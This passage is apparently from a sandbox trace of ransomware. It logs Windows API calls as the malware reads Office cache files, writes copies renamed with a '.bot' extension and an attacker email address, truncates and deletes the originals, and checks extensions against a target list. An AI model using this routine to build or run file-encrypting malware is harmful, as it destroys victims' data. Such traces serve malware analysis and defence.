	[0035.558] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0035.558] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.559] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.559] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0035.559] GetLastError () returned 0x0
	[0035.559] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x1915, lpOverlapped=0x0) returned 1
	[0035.560] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x1920, lpOverlapped=0x0) returned 1
	[0035.561] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.561] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0035.562] SetEndOfFile (hFile=0x1b0) returned 1
	[0035.562] CloseHandle (hObject=0x1b0) returned 1
	[0035.563] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.563] SetEndOfFile (hFile=0x1a0) returned 1
	[0035.563] CloseHandle (hObject=0x1a0) returned 1
	[0035.564] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.564] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1
	[0035.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.564] lstrlenW (lpString=".doc") returned 4
	[0035.564] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.564] lstrlenW (lpString=".docx") returned 5
	[0035.564] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.564] lstrlenW (lpString=".pdf") returned 4
	[0035.564] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.564] lstrlenW (lpString=".xls") returned 4
	[0035.564] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.564] lstrlenW (lpString=".xlsx") returned 5
	[0035.564] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.564] lstrlenW (lpString=".ppt") returned 4
	[0035.564] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.564] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.564] lstrlenW (lpString=".zip") returned 4
	[0035.565] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.565] lstrlenW (lpString=".rar") returned 4
	[0035.565] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString=".bz2") returned 4
	[0035.565] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString=".7z") returned 3
	[0035.565] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.565] lstrlenW (lpString=".dbf") returned 4
	[0035.565] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.565] lstrlenW (lpString=".1cd") returned 4
	[0035.565] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.565] lstrlenW (lpString=".jpg") returned 4
	[0035.565] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.565] lstrlenW (lpString=".doc") returned 4
	[0035.565] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString=".docx") returned 5
	[0035.565] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.565] lstrlenW (lpString=".pdf") returned 4
	[0035.565] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString=".xls") returned 4
	[0035.565] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString=".xlsx") returned 5
	[0035.565] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.565] lstrlenW (lpString=".ppt") returned 4
	[0035.565] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.565] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.565] lstrlenW (lpString=".zip") returned 4
	[0035.565] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.566] lstrlenW (lpString=".rar") returned 4
	[0035.566] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.566] lstrlenW (lpString=".bz2") returned 4
	[0035.566] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.566] lstrlenW (lpString=".7z") returned 3
	[0035.566] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.566] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.566] lstrlenW (lpString=".dbf") returned 4
	[0035.566] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.566] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.566] lstrlenW (lpString=".1cd") returned 4
	[0035.566] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.566] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76
	[0035.566] lstrlenW (lpString=".jpg") returned 4
	[0035.566] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.566] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.566] lstrlenW (lpString="Setup.xml") returned 9
	[0035.566] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0035.566] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=16683) returned 1
	[0035.567] CloseHandle (hObject=0x1a0) returned 1
	[0035.567] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0035.567] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.567] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0035.567] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.567] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.567] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0035.567] GetLastError () returned 0x0
	[0035.567] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x412b, lpOverlapped=0x0) returned 1
	[0035.569] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x4130, lpOverlapped=0x0) returned 1
	[0035.570] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.570] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0035.570] SetEndOfFile (hFile=0x1b0) returned 1
	[0035.570] CloseHandle (hObject=0x1b0) returned 1
	[0035.571] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.571] SetEndOfFile (hFile=0x1a0) returned 1
	[0035.572] CloseHandle (hObject=0x1a0) returned 1
	[0035.572] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.572] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0035.573] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.573] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.573] lstrlenW (lpString=".doc") returned 4
	[0035.573] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.573] lstrlenW (lpString=".docx") returned 5
	[0035.573] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.573] lstrlenW (lpString=".pdf") returned 4
	[0035.573] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.573] lstrlenW (lpString=".xls") returned 4
	[0035.573] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.573] lstrlenW (lpString=".xlsx") returned 5
	[0035.573] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.573] lstrlenW (lpString=".ppt") returned 4
	[0035.573] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.573] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.573] lstrlenW (lpString=".zip") returned 4
	[0035.573] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.573] lstrlenW (lpString=".rar") returned 4
	[0035.573] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.573] lstrlenW (lpString=".bz2") returned 4
	[0035.573] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.573] lstrlenW (lpString=".7z") returned 3
	[0035.573] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.573] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.573] lstrlenW (lpString=".dbf") returned 4
	[0035.573] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.573] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.573] lstrlenW (lpString=".1cd") returned 4
	[0035.573] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.573] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.573] lstrlenW (lpString=".jpg") returned 4
	[0035.573] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.574] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.574] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.574] lstrlenW (lpString=".doc") returned 4
	[0035.574] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.574] lstrlenW (lpString=".docx") returned 5
	[0035.574] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0035.574] lstrlenW (lpString=".pdf") returned 4
	[0035.574] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.574] lstrlenW (lpString=".xls") returned 4
	[0035.574] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.574] lstrlenW (lpString=".xlsx") returned 5
	[0035.574] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0035.574] lstrlenW (lpString=".ppt") returned 4
	[0035.574] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.574] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.574] lstrlenW (lpString=".zip") returned 4
	[0035.574] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.574] lstrlenW (lpString=".rar") returned 4
	[0035.574] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.574] lstrlenW (lpString=".bz2") returned 4
	[0035.574] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.574] lstrlenW (lpString=".7z") returned 3
	[0035.574] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.574] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.574] lstrlenW (lpString=".dbf") returned 4
	[0035.574] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.574] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.574] lstrlenW (lpString=".1cd") returned 4
	[0035.574] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.575] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0035.575] lstrlenW (lpString=".jpg") returned 4
	[0035.575] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.575] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.575] lstrlenW (lpString="Office32WW.xml") returned 14
	[0035.575] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0035.576] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=4274) returned 1
	[0035.576] CloseHandle (hObject=0x1a0) returned 1
	[0035.576] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020
	[0035.576] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0035.576] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0035.576] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.576] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.576] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0035.576] GetLastError () returned 0x0
	[0035.576] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x10b2, lpOverlapped=0x0) returned 1
	[0035.922] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x10c0, lpOverlapped=0x0) returned 1
	[0035.923] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.923] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0035.923] SetEndOfFile (hFile=0x1b0) returned 1
	[0035.923] CloseHandle (hObject=0x1b0) returned 1
	[0035.924] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.924] SetEndOfFile (hFile=0x1a0) returned 1
	[0035.925] CloseHandle (hObject=0x1a0) returned 1
	[0035.925] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.925] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1
	[0035.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.925] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.925] lstrlenW (lpString=".doc") returned 4
	[0035.925] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString=".docx") returned 5
	[0035.926] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.926] lstrlenW (lpString=".pdf") returned 4
	[0035.926] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString=".xls") returned 4
	[0035.926] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString=".xlsx") returned 5
	[0035.926] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.926] lstrlenW (lpString=".ppt") returned 4
	[0035.926] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.926] lstrlenW (lpString=".zip") returned 4
	[0035.926] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.926] lstrlenW (lpString=".rar") returned 4
	[0035.926] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString=".bz2") returned 4
	[0035.926] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString=".7z") returned 3
	[0035.926] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.926] lstrlenW (lpString=".dbf") returned 4
	[0035.926] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.926] lstrlenW (lpString=".1cd") returned 4
	[0035.926] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.926] lstrlenW (lpString=".jpg") returned 4
	[0035.926] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.926] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.926] lstrlenW (lpString=".doc") returned 4
	[0035.926] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0035.926] lstrlenW (lpString=".docx") returned 5
	[0035.926] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1
	[0035.927] lstrlenW (lpString=".pdf") returned 4
	[0035.927] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0035.927] lstrlenW (lpString=".xls") returned 4
	[0035.927] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0035.927] lstrlenW (lpString=".xlsx") returned 5
	[0035.927] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1
	[0035.927] lstrlenW (lpString=".ppt") returned 4
	[0035.927] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0035.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.927] lstrlenW (lpString=".zip") returned 4
	[0035.927] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0035.927] lstrlenW (lpString=".rar") returned 4
	[0035.927] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0035.927] lstrlenW (lpString=".bz2") returned 4
	[0035.927] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0035.927] lstrlenW (lpString=".7z") returned 3
	[0035.927] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0035.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.927] lstrlenW (lpString=".dbf") returned 4
	[0035.927] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0035.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.927] lstrlenW (lpString=".1cd") returned 4
	[0035.927] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0035.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77
	[0035.927] lstrlenW (lpString=".jpg") returned 4
	[0035.927] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0035.927] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0035.927] lstrlenW (lpString="boxed-delete.avi") returned 16
	[0035.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
